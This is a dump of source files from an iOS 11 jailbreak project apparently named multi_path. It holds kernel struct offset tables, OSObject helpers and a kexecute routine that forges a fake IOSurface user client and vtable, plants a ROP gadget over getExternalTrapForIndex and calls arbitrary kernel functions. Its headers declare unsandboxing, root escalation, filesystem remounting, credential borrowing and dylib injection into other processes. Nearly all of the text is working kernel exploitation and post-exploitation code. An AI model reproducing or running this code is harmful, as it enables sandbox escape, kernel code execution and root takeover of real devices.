64 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
65 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
66 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
67 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
68 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
69 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
70 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
71 |
72 | 0x10, // KSTRUCT_OFFSET_PROC_PID,
73 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD
74 |
75 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
76 |
77 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
78 |
79 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
80 |
81 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
82 |
83 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
84 |
85 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
86 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
87 |
88 | 0x7c, // KFREE_ADDR_OFFSET
89 | };
90 |
91 | int koffset(enum kstruct_offset offset) {
92 | if (offsets == NULL) {
93 | printf("need to call offsets_init() prior to querying offsets\n");
94 | return 0;
95 | }
96 | return offsets[offset];
97 | }
98 |
99 |
100 | void offsets_init() {
101 | /* if (@available(iOS 11.4, *)) {
102 | printf("this bug is patched in iOS 11.4 and above\n");
103 | exit(EXIT_FAILURE);
104 | } else if (@available(iOS 11.3, *)) {
105 | printf("offsets selected for iOS 11.3 or above\n");
106 | offsets = kstruct_offsets_11_3;
107 | } else if (@available(iOS 11.0, *)) {
108 | printf("offsets selected for iOS 11.0 to 11.2.6\n");
109 | offsets = kstruct_offsets_11_0;
110 | } else {
111 | printf("iOS version too low, 11.0 required\n");
112 | exit(EXIT_FAILURE);
113 | }*/
114 | offsets = kstruct_offsets_11_3;
115 | }
116 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/osobject.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "kexecute.h"
3 | #include "kern_utils.h"
4 | #include "patchfinder64.h"
5 | #include "osobject.h"
6 |
7 | // offsets in vtable:
8 | static uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;
9 | static uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;
10 | static uint32_t off_OSDictionary_Merge = sizeof(void*) * 0x23;
11 |
12 | static uint32_t off_OSArray_Merge = sizeof(void*) * 0x1E;
13 | static uint32_t off_OSArray_RemoveObject = sizeof(void*) * 0x20;
14 | static uint32_t off_OSArray_GetObject = sizeof(void*) * 0x22;
15 |
16 | static uint32_t off_OSObject_Release = sizeof(void*) * 0x05;
17 | static uint32_t off_OSObject_GetRetainCount = sizeof(void*) * 0x03;
18 | static uint32_t off_OSObject_Retain = sizeof(void*) * 0x04;
19 |
20 | static uint32_t off_OSString_GetLength = sizeof(void*) * 0x11;
21 |
22 | // 1 on success, 0 on error
23 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
24 | size_t len = strlen(key) + 1;
25 |
26 | uint64_t ks = kalloc(len);
27 | kwrite(ks, key, len);
28 |
29 | uint64_t vtab = kread64(dict);
30 | uint64_t f = kread64(vtab + off_OSDictionary_SetObjectWithCharP);
31 |
32 | int rv = (int) kexecute(f, dict, ks, val, 0, 0, 0, 0);
33 |
34 | kfree(ks, len);
35 |
36 | return rv;
37 | }
38 |
39 | // XXX it can return 0 in lower 32 bits but still be valid
40 | // fix addr of returned value and check if kread64 gives ptr
41 | // to vtable addr saved before
42 |
43 | // address if exists, 0 if not
44 | uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
45 | size_t len = strlen(key) + 1;
46 |
47 | uint64_t ks = kalloc(len);
48 | kwrite(ks, key, len);
49 |
50 | uint64_t vtab = kread64(dict);
51 | uint64_t f = kread64(vtab + off_OSDictionary_GetObjectWithCharP);
52 |
53 | int rv = (int) kexecute(f, dict, ks, 0, 0, 0, 0, 0);
54 |
55 | kfree(ks, len);
56 |
57 | return rv;
58 | }
59 |
60 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
61 | uint64_t ret = _OSDictionary_GetItem(dict, key);
62 |
63 | if (ret != 0) {
64 | // XXX can it be not in zalloc?..
65 | ret = zm_fix_addr(ret);
66 | }
67 |
68 | return ret;
69 | }
70 |
71 | // 1 on success, 0 on error
72 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
73 | uint64_t vtab = kread64(dict);
74 | uint64_t f = kread64(vtab + off_OSDictionary_Merge);
75 |
76 | return (int) kexecute(f, dict, aDict, 0, 0, 0, 0, 0);
77 | }
78 |
79 | // 1 on success, 0 on error
80 | int OSArray_Merge(uint64_t array, uint64_t aArray) {
81 | uint64_t vtab = kread64(array);
82 | uint64_t f = kread64(vtab + off_OSArray_Merge);
83 |
84 | return (int) kexecute(f, array, aArray, 0, 0, 0, 0, 0);
85 | }
86 |
87 | uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
88 | uint64_t vtab = kread64(array);
89 | uint64_t f = kread64(vtab + off_OSArray_GetObject);
90 |
91 | return kexecute(f, array, idx, 0, 0, 0, 0, 0);
92 | }
93 |
94 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
95 | uint64_t ret = _OSArray_GetObject(array, idx);
96 |
97 | if (ret != 0){
98 | // XXX can it be not in zalloc?..
99 | ret = zm_fix_addr(ret);
100 | }
101 | return ret;
102 | }
103 |
104 | void OSArray_RemoveObject(uint64_t array, unsigned int idx){
105 | uint64_t vtab = kread64(array);
106 | uint64_t f = kread64(vtab + off_OSArray_RemoveObject);
107 |
108 | (void)kexecute(f, array, idx, 0, 0, 0, 0, 0);
109 | }
110 |
111 | // XXX error handling just for fun? :)
112 | uint64_t _OSUnserializeXML(const char* buffer) {
113 | size_t len = strlen(buffer) + 1;
114 |
115 | uint64_t ks = kalloc(len);
116 | kwrite(ks, buffer, len);
117 |
118 | uint64_t errorptr = 0;
119 |
120 | uint64_t rv = kexecute(find_osunserializexml(), ks, errorptr, 0, 0, 0, 0, 0);
121 | kfree(ks, len);
122 |
123 | return rv;
124 | }
125 |
126 | uint64_t OSUnserializeXML(const char* buffer) {
127 | uint64_t ret = _OSUnserializeXML(buffer);
128 |
129 | if (ret != 0) {
130 | // XXX can it be not in zalloc?..
131 | ret = zm_fix_addr(ret);
132 | }
133 |
134 | return ret;
135 | }
136 |
137 | void OSObject_Release(uint64_t osobject) {
138 | uint64_t vtab = kread64(osobject);
139 | uint64_t f = kread64(vtab + off_OSObject_Release);
140 | (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
141 | }
142 |
143 | void OSObject_Retain(uint64_t osobject) {
144 | uint64_t vtab = kread64(osobject);
145 | uint64_t f = kread64(vtab + off_OSObject_Release);
146 | (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
147 | }
148 |
149 | uint32_t OSObject_GetRetainCount(uint64_t osobject) {
150 | uint64_t vtab = kread64(osobject);
151 | uint64_t f = kread64(vtab + off_OSObject_Release);
152 | return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
153 | }
154 |
155 | unsigned int OSString_GetLength(uint64_t osstring){
156 | uint64_t vtab = kread64(osstring);
157 | uint64_t f = kread64(vtab + off_OSString_GetLength);
158 | return (unsigned int)kexecute(f, osstring, 0, 0, 0, 0, 0, 0);
159 | }
160 |
161 | char *OSString_CopyString(uint64_t osstring){
162 | unsigned int length = OSString_GetLength(osstring);
163 | char *str = malloc(length + 1);
164 | str[length] = 0;
165 |
166 | kread(OSString_CStringPtr(osstring), str, length);
167 | return str;
168 | }
169 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/osobject.h:
--------------------------------------------------------------------------------
1 | #define OSDictionary_ItemCount(dict) kread32(dict+20)
2 | #define OSDictionary_ItemBuffer(dict) kread64(dict+32)
3 | #define OSDictionary_ItemKey(buffer, idx) kread64(buffer+16*idx)
4 | #define OSDictionary_ItemValue(buffer, idx) kread64(buffer+16*idx+8)
5 | #define OSString_CStringPtr(str) kread64(str + 0x10)
6 | #define OSArray_ItemCount(arr) kread32(arr+0x14)
7 | #define OSArray_ItemBuffer(arr) kread64(arr+32)
8 |
9 | // see osobject.c for info
10 |
11 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);
12 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key);
13 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict);
14 | void OSArray_RemoveObject(uint64_t array, unsigned int idx);
15 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx);
16 | int OSArray_Merge(uint64_t array, uint64_t aArray);
17 | uint64_t OSUnserializeXML(const char* buffer);
18 |
19 | void OSObject_Release(uint64_t osobject);
20 | void OSObject_Retain(uint64_t osobject);
21 | uint32_t OSObject_GetRetainCount(uint64_t osobject);
22 |
23 | unsigned int OSString_GetLength(uint64_t osstring);
24 | char *OSString_CopyString(uint64_t osstring);
25 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/patchfinder64.h:
--------------------------------------------------------------------------------
1 | #ifndef PATCHFINDER64_H_
2 | #define PATCHFINDER64_H_
3 |
4 | #define CACHED_FIND(type, name) \
5 | type __##name(void);\
6 | type name(void) { \
7 | static type cached = 0; \
8 | if (cached == 0) { \
9 | cached = __##name(); \
10 | } \
11 | return cached; \
12 | } \
13 | type __##name(void)
14 |
15 | int init_kernel(uint64_t base, const char *filename);
16 | void term_kernel(void);
17 |
18 | // Fun part
19 | uint64_t find_allproc(void);
20 | uint64_t find_add_x0_x0_0x40_ret(void);
21 | uint64_t find_OSBoolean_True(void);
22 | uint64_t find_OSBoolean_False(void);
23 | uint64_t find_zone_map_ref(void);
24 | uint64_t find_osunserializexml(void);
25 | uint64_t find_smalloc(void);
26 |
27 | #endif
28 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/OSMessageNotification.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | /*
24 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.
25 | *
26 | * HISTORY
27 | *
28 | */
29 |
30 | #ifndef __OS_OSMESSAGENOTIFICATION_H
31 | #define __OS_OSMESSAGENOTIFICATION_H
32 |
33 | #ifdef __cplusplus
34 | extern "C" {
35 | #endif
36 |
37 | #include
38 | #include "IOReturn.h"
39 |
40 | enum {
41 | kFirstIOKitNotificationType = 100,
42 | kIOServicePublishNotificationType = 100,
43 | kIOServiceMatchedNotificationType = 101,
44 | kIOServiceTerminatedNotificationType = 102,
45 | kIOAsyncCompletionNotificationType = 150,
46 | kIOServiceMessageNotificationType = 160,
47 | kLastIOKitNotificationType = 199
48 | };
49 |
50 | enum {
51 | kOSNotificationMessageID = 53,
52 | kOSAsyncCompleteMessageID = 57,
53 | kMaxAsyncArgs = 16
54 | };
55 |
56 | enum {
57 | kIOAsyncReservedIndex = 0,
58 | kIOAsyncReservedCount,
59 |
60 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount,
61 | kIOAsyncCalloutRefconIndex,
62 | kIOAsyncCalloutCount,
63 |
64 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount,
65 | kIOMatchingCalloutRefconIndex,
66 | kIOMatchingCalloutCount,
67 |
68 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount,
69 | kIOInterestCalloutRefconIndex,
70 | kIOInterestCalloutServiceIndex,
71 | kIOInterestCalloutCount
72 | };
73 |
74 | enum {
75 | kOSAsyncRefCount = 8,
76 | kOSAsyncRefSize = 32
77 | };
78 | typedef natural_t OSAsyncReference[kOSAsyncRefCount];
79 |
80 | struct OSNotificationHeader {
81 | vm_size_t size; /* content size */
82 | natural_t type;
83 | OSAsyncReference reference;
84 |
85 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
86 | unsigned char content[];
87 | #else
88 | unsigned char content[0];
89 | #endif
90 | };
91 |
92 | struct IOServiceInterestContent {
93 | natural_t messageType;
94 | void * messageArgument[1];
95 | };
96 |
97 | struct IOAsyncCompletionContent {
98 | IOReturn result;
99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
100 | void * args[];
101 | #else
102 | void * args[0];
103 | #endif
104 | };
105 |
106 | #ifndef __cplusplus
107 | typedef struct OSNotificationHeader OSNotificationHeader;
108 | typedef struct IOServiceInterestContent IOServiceInterestContent;
109 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
110 | #endif
111 |
112 | #ifdef __cplusplus
113 | }
114 | #endif
115 |
116 | #endif /* __OS_OSMESSAGENOTIFICATION_H */
117 |
118 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/Readme.md:
--------------------------------------------------------------------------------
1 | IOKit for iOS SDK7.0
2 | =======
3 |
4 | 
5 |
6 | 在某些时候可能会用到IOKit来获取一些信息,但是将sdk从6.x升级到7.0的sdk之后就会发现那个libIOKit.dylib找不到了。晚上的办法是将6.x的sdk复制到7.0的sdk下,或者创建一个符号链接。
7 |
8 | 其实还有另外的一个解决办法,在7.0之后这个东西只是不是dylib了,而是成了一个framework。在这个目录下
9 |
10 | /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS7.0.sdk/System/Library/Frameworks/IOKit.framework,所以只需要将工程中的iokit用framework替换掉就可以了。另外这个并没有头文件,如果要用也得自己去提取相关的头文件。可以用classdump来生成。我用的是apple xun中的头文件,效果是一样的,这里整理了一下,需要的直接放入工程目录下引入IOKitLib.h就可以了。
--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/screenshot.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jelbrek/include/IOKit/screenshot.jpg
--------------------------------------------------------------------------------
/multi_path/jelbrek/inject_criticald.h:
--------------------------------------------------------------------------------
1 | int inject_dylib(pid_t pid, char *loaded_dylib);
2 | uint64_t binary_load_address(mach_port_t tp);
3 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/jelbrek.h:
--------------------------------------------------------------------------------
1 | #include "QiLin.h"
2 |
3 | void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base);
4 | kern_return_t trust_bin(const char *path);
5 | BOOL unsandbox(pid_t pid);
6 | void setcsflags(pid_t pid);
7 | BOOL get_root(pid_t pid);
8 | void remount1126(void);
9 | void mountDevAtPathAsRW(const char* devpath, const char* path);
10 | void remount1131(void);
11 | void platformize(pid_t pid);
12 | void entitlePid(pid_t pid, const char *ent1, _Bool val1);
13 | int launch(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);
14 | int launchAsPlatform(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);
15 | void undoCredDonation(uint64_t selfcred);
16 | uint64_t borrowCredsFromPid(pid_t donor);
17 | uint64_t borrowCredsFromDonor(char *binary);
18 |
19 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/kern_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // fun_utils.h
3 | // async_wake_ios
4 | //
5 | // Created by George on 18/12/17.
6 | // Copyright © 2017 Ian Beer. All rights reserved.
7 | //
8 |
9 | #ifndef fun_utils_h
10 | #define fun_utils_h
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 | // Needed definitions
24 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
25 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
26 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
27 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size);
28 |
29 | // "General" purpose
30 | uint8_t *get_sha256(uint8_t* code_dir);
31 | uint8_t *get_code_directory(const char* name);
32 | int cp(const char *from, const char *to);
33 | int file_exist(char *filename);
34 |
35 | // Kernel utility stuff
36 | void init_kernel_utils(mach_port_t tfp0);
37 | uint64_t kalloc(vm_size_t size);
38 | void kfree(mach_vm_address_t address, vm_size_t size);
39 | size_t kread(uint64_t where, void *p, size_t size);
40 | uint32_t kread32(uint64_t where);
41 | uint64_t kread64(uint64_t where);
42 | size_t kwrite(uint64_t where, const void *p, size_t size);
43 | void kwrite32(uint64_t where, uint32_t what);
44 | void kwrite64(uint64_t where, uint64_t what);
45 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
46 | mach_port_t fake_host_priv(void);
47 | uint64_t zm_fix_addr(uint64_t addr);
48 | uint64_t proc_for_pid(pid_t pid);
49 | uint64_t proc_for_name(char *nm);
50 | unsigned int pid_for_name(char *nm);
51 | uint64_t find_port_address(mach_port_name_t port);
52 | uint64_t task_self_addr(void);
53 | uint64_t kmem_alloc_wired(uint64_t size);
54 | uint64_t find_kernproc(void);
55 | uint64_t find_kernel_base(void);
56 | uint64_t getVnodeAtPath(const char *path);
57 | #endif /* fun_utils_h */
58 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/kexecute.c:
--------------------------------------------------------------------------------
1 |
2 | #include
3 | #include "kern_utils.h"
4 | #include "kexecute.h"
5 | #include "patchfinder64.h"
6 | #include "offsetof.h"
7 | #include
8 |
9 | mach_port_t prepare_user_client(void) {
10 | kern_return_t err;
11 | mach_port_t user_client;
12 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
13 |
14 | if (service == IO_OBJECT_NULL){
15 | printf(" [-] unable to find service\n");
16 | exit(EXIT_FAILURE);
17 | }
18 |
19 | err = IOServiceOpen(service, mach_task_self(), 0, &user_client);
20 | if (err != KERN_SUCCESS){
21 | printf(" [-] unable to get user client connection\n");
22 | exit(EXIT_FAILURE);
23 | }
24 |
25 |
26 | //
27 | printf("got user client: 0x%x\n", user_client);
28 | return user_client;
29 | }
30 |
31 | // TODO: Consider removing this - jailbreakd runs all kernel ops on the main thread
32 | pthread_mutex_t kexecute_lock;
33 | static mach_port_t user_client;
34 | static uint64_t IOSurfaceRootUserClient_port;
35 | static uint64_t IOSurfaceRootUserClient_addr;
36 | static uint64_t fake_vtable;
37 | static uint64_t fake_client;
38 | const int fake_kalloc_size = 0x1000;
39 |
40 | void init_kexecute(void) {
41 | user_client = prepare_user_client();
42 |
43 | // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
44 | IOSurfaceRootUserClient_port = find_port_address(user_client); // UserClients are just mach_ports, so we find its address
45 | //
46 | printf("Found port: 0x%llx\n", IOSurfaceRootUserClient_port);
47 |
48 | IOSurfaceRootUserClient_addr = kread64(IOSurfaceRootUserClient_port + offsetof_ip_kobject); // The UserClient itself (the C++ object) is at the kobject field
49 | //
50 | printf("Found addr: 0x%llx\n", IOSurfaceRootUserClient_addr);
51 |
52 | uint64_t IOSurfaceRootUserClient_vtab = kread64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
53 | //
54 | printf("Found vtab: 0x%llx\n", IOSurfaceRootUserClient_vtab);
55 |
56 | // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
57 | // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel
58 |
59 |
60 | // Create the vtable in the kernel memory, then copy the existing vtable into there
61 | fake_vtable = kalloc(fake_kalloc_size);
62 | //
63 | printf("Created fake_vtable at %016llx\n", fake_vtable);
64 |
65 | for (int i = 0; i < 0x200; i++) {
66 | kwrite64(fake_vtable+i*8, kread64(IOSurfaceRootUserClient_vtab+i*8));
67 | }
68 |
69 | //
70 | printf("Copied some of the vtable over\n");
71 |
72 | // Create the fake user client
73 | fake_client = kalloc(fake_kalloc_size);
74 | //
75 | printf("Created fake_client at %016llx\n", fake_client);
76 |
77 | for (int i = 0; i < 0x200; i++) {
78 | kwrite64(fake_client+i*8, kread64(IOSurfaceRootUserClient_addr+i*8));
79 | }
80 |
81 | //
82 | printf("Copied the user client over\n");
83 |
84 | // Write our fake vtable into the fake user client
85 | kwrite64(fake_client, fake_vtable);
86 |
87 | // Replace the user client with ours
88 | kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, fake_client);
89 |
90 | // Now the userclient port we have will look into our fake user client rather than the old one
91 |
92 | // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
93 | kwrite64(fake_vtable+8*0xB7, find_add_x0_x0_0x40_ret());
94 |
95 | //
96 | printf("Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndex");
97 |
98 | pthread_mutex_init(&kexecute_lock, NULL);
99 | }
100 |
101 | void term_kexecute(void) {
102 | kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, IOSurfaceRootUserClient_addr);
103 | kfree(fake_vtable, fake_kalloc_size);
104 | kfree(fake_client, fake_kalloc_size);
105 | }
106 |
107 | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {
108 | pthread_mutex_lock(&kexecute_lock);
109 |
110 | // When calling IOConnectTrapX, this makes a call to iokit_user_client_trap, which is the user->kernel call (MIG). This then calls IOUserClient::getTargetAndTrapForIndex
111 | // to get the trap struct (which contains an object and the function pointer itself). This function calls IOUserClient::getExternalTrapForIndex, which is expected to return a trap.
112 | // This jumps to our gadget, which returns +0x40 into our fake user_client, which we can modify. The function is then called on the object. But how C++ actually works is that the
113 | // function is called with the first arguement being the object (referenced as `this`). Because of that, the first argument of any function we call is the object, and everything else is passed
114 | // through like normal.
115 |
116 | // Because the gadget gets the trap at user_client+0x40, we have to overwrite the contents of it
117 | // We will pull a switch when doing so - retrieve the current contents, call the trap, put back the contents
118 | // (i'm not actually sure if the switch back is necessary but meh)
119 |
120 | uint64_t offx20 = kread64(fake_client+0x40);
121 | uint64_t offx28 = kread64(fake_client+0x48);
122 | kwrite64(fake_client+0x40, x0);
123 | kwrite64(fake_client+0x48, addr);
124 | uint64_t returnval = IOConnectTrap6(user_client, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6));
125 | kwrite64(fake_client+0x40, offx20);
126 | kwrite64(fake_client+0x48, offx28);
127 |
128 | pthread_mutex_unlock(&kexecute_lock);
129 |
130 | return returnval;
131 | }
132 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/kexecute.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
5 | void init_kexecute(void);
6 | void term_kexecute(void);
7 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/libjb.h:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | #ifndef libjb_h_included
4 | #define libjb_h_included
5 |
6 |
7 |
8 | /* libhfs *******************************************************************/
9 |
10 | enum {
11 | kPermOtherExecute = 1 << 0,
12 | kPermOtherWrite = 1 << 1,
13 | kPermOtherRead = 1 << 2,
14 | kPermGroupExecute = 1 << 3,
15 | kPermGroupWrite = 1 << 4,
16 | kPermGroupRead = 1 << 5,
17 | kPermOwnerExecute = 1 << 6,
18 | kPermOwnerWrite = 1 << 7,
19 | kPermOwnerRead = 1 << 8,
20 | kPermMask = 0x1FF,
21 | kOwnerNotRoot = 1 << 9,
22 | kFileTypeUnknown = 0x0 << 16,
23 | kFileTypeFlat = 0x1 << 16,
24 | kFileTypeDirectory = 0x2 << 16,
25 | kFileTypeLink = 0x3 << 16,
26 | kFileTypeMask = 0x3 << 16
27 | };
28 |
29 | typedef long CICell;
30 |
31 | extern char *gLoadAddr; /* buffer of size 32MB (max file size) */
32 |
33 | CICell HFSOpen(const char *filename, long offset);
34 | long HFSReadFile(CICell ih, char *filePath, void *base, unsigned long offset, unsigned long length);
35 | long HFSGetDirEntry(CICell ih, char *dirPath, unsigned long *dirIndex, char **name, long *flags, long *time);
36 | void HFSClose(CICell);
37 |
38 | /* untar ********************************************************************/
39 |
40 | /* untar 'a' to current directory. path is name of archive (informational) */
41 | void untar(FILE *a, const char *path);
42 |
43 | /* launchctl ****************************************************************/
44 |
45 | int launchctl_load_cmd(const char *filename, int do_load, int opt_force, int opt_write);
46 |
47 | /* hashes *******************************************************************/
48 |
49 | struct trust_dsk {
50 | unsigned int version;
51 | unsigned char uuid[16];
52 | unsigned int count;
53 | //unsigned char data[];
54 | } __attribute__((packed));
55 |
56 | struct trust_mem {
57 | uint64_t next; //struct trust_mem *next;
58 | unsigned char uuid[16];
59 | unsigned int count;
60 | //unsigned char data[];
61 | } __attribute__((packed));
62 |
63 | struct hash_entry_t {
64 | uint16_t num;
65 | uint16_t start;
66 | } __attribute__((packed));
67 |
68 | typedef uint8_t hash_t[20];
69 |
70 | extern hash_t *allhash;
71 | extern unsigned numhash;
72 | extern struct hash_entry_t *amfitab;
73 | extern hash_t *allkern;
74 |
75 | /* can be called multiple times. kernel read func & amfi/top trust chain block are optional */
76 | int grab_hashes(const char *root, size_t (*kread)(uint64_t, void *, size_t), uint64_t amfi, uint64_t top);
77 |
78 | #endif
79 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/offsetof.c:
--------------------------------------------------------------------------------
1 | unsigned offsetof_p_pid = 0x10; // proc_t::p_pid
2 | unsigned offsetof_task = 0x18; // proc_t::task
3 | unsigned offsetof_p_uid = 0x30; // proc_t::p_uid
4 | unsigned offsetof_p_gid = 0x34; // proc_t::p_uid
5 | unsigned offsetof_p_ruid = 0x38; // proc_t::p_uid
6 | unsigned offsetof_p_rgid = 0x3c; // proc_t::p_uid
7 | unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred
8 | unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags
9 | unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port)
10 | unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port)
11 | unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port)
12 | unsigned offsetof_itk_space = 0x308; // task_t::itk_space
13 | unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send)
14 | unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send)
15 | unsigned offsetof_ip_kobject = 0x68; // ipc_port_t::ip_kobject
16 | unsigned offsetof_p_textvp = 0x248; // proc_t::p_textvp
17 | unsigned offsetof_p_textoff = 0x250; // proc_t::p_textoff
18 | unsigned offsetof_p_cputype = 0x2c0; // proc_t::p_cputype
19 | unsigned offsetof_p_cpu_subtype = 0x2c4; // proc_t::p_cpu_subtype
20 | unsigned offsetof_special = 2 * sizeof(long); // host::special
21 | unsigned offsetof_ipc_space_is_table = 0x20; // ipc_space::is_table?..
22 |
23 | unsigned offsetof_ucred_cr_uid = 0x18; // ucred::cr_uid
24 | unsigned offsetof_ucred_cr_ruid = 0x1c; // ucred::cr_ruid
25 | unsigned offsetof_ucred_cr_svuid = 0x20; // ucred::cr_svuid
26 | unsigned offsetof_ucred_cr_ngroups = 0x24; // ucred::cr_ngroups
27 | unsigned offsetof_ucred_cr_groups = 0x28; // ucred::cr_groups
28 | unsigned offsetof_ucred_cr_rgid = 0x68; // ucred::cr_rgid
29 | unsigned offsetof_ucred_cr_svgid = 0x6c; // ucred::cr_svgid
30 |
31 | unsigned offsetof_v_type = 0x70; // vnode::v_type
32 | unsigned offsetof_v_id = 0x74; // vnode::v_id
33 | unsigned offsetof_v_ubcinfo = 0x78; // vnode::v_ubcinfo
34 |
35 | unsigned offsetof_ubcinfo_csblobs = 0x50; // ubc_info::csblobs
36 |
37 | unsigned offsetof_csb_cputype = 0x8; // cs_blob::csb_cputype
38 | unsigned offsetof_csb_flags = 0x12; // cs_blob::csb_flags
39 | unsigned offsetof_csb_base_offset = 0x16; // cs_blob::csb_base_offset
40 | unsigned offsetof_csb_entitlements_offset = 0x98; // cs_blob::csb_entitlements
41 | unsigned offsetof_csb_signer_type = 0xA0; // cs_blob::csb_signer_type
